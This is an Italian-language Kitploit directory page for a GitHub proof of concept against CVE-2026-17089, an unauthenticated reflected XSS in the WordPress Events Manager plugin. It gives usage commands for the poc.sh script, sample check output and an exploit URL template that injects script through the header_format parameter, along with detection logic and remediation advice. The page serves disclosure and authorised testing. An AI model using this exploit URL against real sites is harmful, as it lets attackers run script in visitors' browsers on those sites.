Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-17089-PoC-pwnVader — Shell PoC per CVE-2026-17089, un XSS riflesso non autenticato nel plugin WordPress Events Manager (<= 7.4.0.1); identifica il plugin e verifica la riflessione di header_format. | Kitploit
Strumenti/GitHubGitHub/pwnvader/cve-2026-17089-poc-pwnvader
Scanner di VulnerabilitàScanner di Vulnerabilità WebAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniSicurezza WebPenetration Testing
GitHubpwnvader/cve-2026-17089-poc-pwnvader

CVE-2026-17089-PoC-pwnVader

Shell PoC per CVE-2026-17089, un XSS riflesso non autenticato nel plugin WordPress Events Manager (<= 7.4.0.1); identifica il plugin e verifica la riflessione di header_format.

Vedi Repository
10 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-17089 — Events Manager <= 7.4.0.1 — XSS riflesso non autenticato (header_format)

Autore: pwnVader · Licenza: MIT (radice del repository)

ComponenteEvents Manager – Calendar, Bookings, Tickets, and more! (plugin WordPress)
TipoCWE-79 — Cross-Site Scripting riflesso
Affetto<= 7.4.0.1
Correttorelease successiva 7.4.x (wp_kses_post() applicato in EM_Events::output_grouped())
CVECVE-2026-17089 — CVSS 3.1 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
PoCpoc.sh

Riepilogo

Il punto di ingresso dello shortcode sanifica header_format con wp_kses(), ma l'azione AJAX non autenticata search_events_grouped aggira tale sanificazione ed emette il valore nella risposta HTML (EM_Events::output_grouped()). Un attaccante remoto non autenticato può creare un URL che esegue JavaScript arbitrario nell'origine del sito interessato per qualsiasi utente che lo apra (UI:R).

Utilizzo

# Interactive menu
./poc.sh

# Read-only: fingerprint the plugin and test the unescaped reflection
./poc.sh check --target https://example.com

# Print the exploit URL (open it in a browser; the script runs in the target origin)
./poc.sh url --target https://example.com --payload "alert(document.domain)"

Output di esempio (check)

== CVE-2026-17089 PoC (check) ==
target: https://example.com

[1] Plugin fingerprint (read-only)
  [PASS] Events Manager assets are served (plugin installed)
  [info] Stable tag: 7.1.7
  [PASS] version 7.1.7 is in the affected range (<= 7.4.0.1)

[2] Unauthenticated reflection test (read-only, benign marker)
  [PASS] endpoint reflected header_format UNESCAPED (the raw  is in the response)

== RESULT: 3 PASS / 0 FAIL ==
VULNERABLE to CVE-2026-17089 (unauthenticated reflected XSS).

URL di exploit

https://example.com/wp-admin/admin-ajax.php?action=search_events_grouped&scope=all&limit=5&header_format=<urlencoded payload>

Logica di rilevamento

  1. Fingerprint: readme.txt (Stable tag) e/o il percorso dell'asset del plugin /wp-content/plugins/events-manager/includes/js/events-manager.js.
  2. Inviare un marker benigno (``) a admin-ajax.php?action=search_events_grouped con header_format impostato al marker e verificare se il markup grezzo viene riflesso non escapato nel corpo della risposta.

Remediation

  • Aggiornare Events Manager alla release corrente (la correzione applica wp_kses_post() a header_format all'interno della funzione di rendering, coprendo ogni chiamante).
  • Misura temporanea: bloccare l'azione AJAX non autenticata search_events_grouped o filtrare header_format a livello di WAF/applicazione.

Riferimenti

  • NVD — CVE-2026-17089: https://nvd.nist.gov/vuln/detail/CVE-2026-17089
  • GitHub Advisory: https://github.com/advisories/GHSA-gg76-jx66-hjq8

Disclaimer

Solo per test di sicurezza autorizzati. Il PoC è in sola lettura (check) o stampa un URL (url); nessun dato viene modificato.

Scarica lo strumento